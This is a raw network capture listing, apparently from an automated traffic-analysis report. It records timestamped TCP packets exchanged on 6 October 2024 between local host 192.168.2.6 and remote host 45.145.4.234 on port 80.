                                                                                                                                                Oct 6, 2024 22:18:45.951409101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.951450109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.951636076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951649904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951662064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951672077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951682091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.951683044 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951698065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.951716900 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.951745033 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.952167034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952179909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952192068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952203035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952214003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952224016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.952224016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952236891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952246904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952249050 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.952259064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952270031 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952276945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.952301979 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.952836037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952850103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952861071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.952894926 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.952918053 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.953074932 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953085899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953098059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953109980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953120947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.953156948 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.953174114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953186989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953197956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953203917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953214884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953216076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.953227043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953238964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953248978 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.953250885 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.953282118 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.954174042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954185963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954195976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954206944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954216003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954226971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954229116 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.954236984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954247952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954252005 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.954258919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954269886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954274893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.954282045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954293013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954298019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.954303026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.954329014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.954344988 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.955466032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955481052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955492020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955502987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955513000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955522060 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.955532074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955543995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955543995 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.955554962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955565929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955576897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955576897 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.955588102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955599070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.955600023 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.955625057 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.955645084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.956332922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956347942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956358910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956368923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956379890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956382990 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.956391096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956403017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956413031 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956414938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.956423998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956433058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956444025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956450939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.956454039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956465006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956475019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956480026 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.956506968 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.956938028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956949949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956964016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956969976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956975937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956976891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956981897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956983089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956986904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.956988096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.956999063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957009077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957019091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.957020044 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957030058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957040071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957048893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.957050085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957067966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.957088947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.957801104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957813025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957835913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957845926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957851887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.957859039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957869053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957880020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957885027 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.957890034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957906961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957916021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957922935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.957926035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957937002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957947016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957947016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.957957029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957967043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957973003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.957979918 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:45.957994938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:45.958177090 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.028028965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028059959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028069973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028125048 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028136969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028141975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.028150082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028177023 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.028227091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.028502941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028546095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.028574944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028589964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028613091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.028635025 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.028650999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028719902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028723955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.028736115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.028757095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.028774977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.029189110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.029227018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.029249907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.029263020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.029284000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.029300928 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.037990093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038048983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038060904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038081884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038109064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038126945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038139105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038150072 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038161039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038165092 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038203001 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038270950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038299084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038310051 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038335085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038408995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038420916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038433075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038441896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038443089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038467884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038496017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038530111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038568020 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038636923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038650036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038661003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038671017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038672924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038682938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038692951 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038721085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038908005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038918972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038930893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038940907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.038940907 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.038976908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039113045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039124966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039140940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039146900 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039155006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039176941 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039203882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039375067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039403915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039411068 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039413929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039426088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039436102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039437056 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039447069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039458990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039459944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039490938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039670944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039705992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039829016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039840937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039851904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039861917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039865017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039875031 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039885998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039892912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039896965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039907932 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039918900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.039927006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039943933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.039971113 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040307999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040319920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040333033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040343046 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040344000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040357113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040364981 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040366888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040378094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040394068 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040412903 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040558100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040570021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040594101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040610075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040620089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040621042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040632963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040644884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040668964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040905952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040918112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040929079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040940046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040946007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040950060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040971994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040973902 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.040983915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.040994883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041004896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041007042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.041016102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041028023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041029930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.041054964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.041070938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.041790009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041802883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041811943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041821957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041831970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041841030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.041842937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041855097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041862011 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.041865110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041877031 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041888952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041897058 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.041899920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041910887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.041924000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.042095900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.042108059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.042118073 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.042119026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.042129993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.042130947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.042141914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.042161942 CEST6388580192.168.2.645.145.4.234
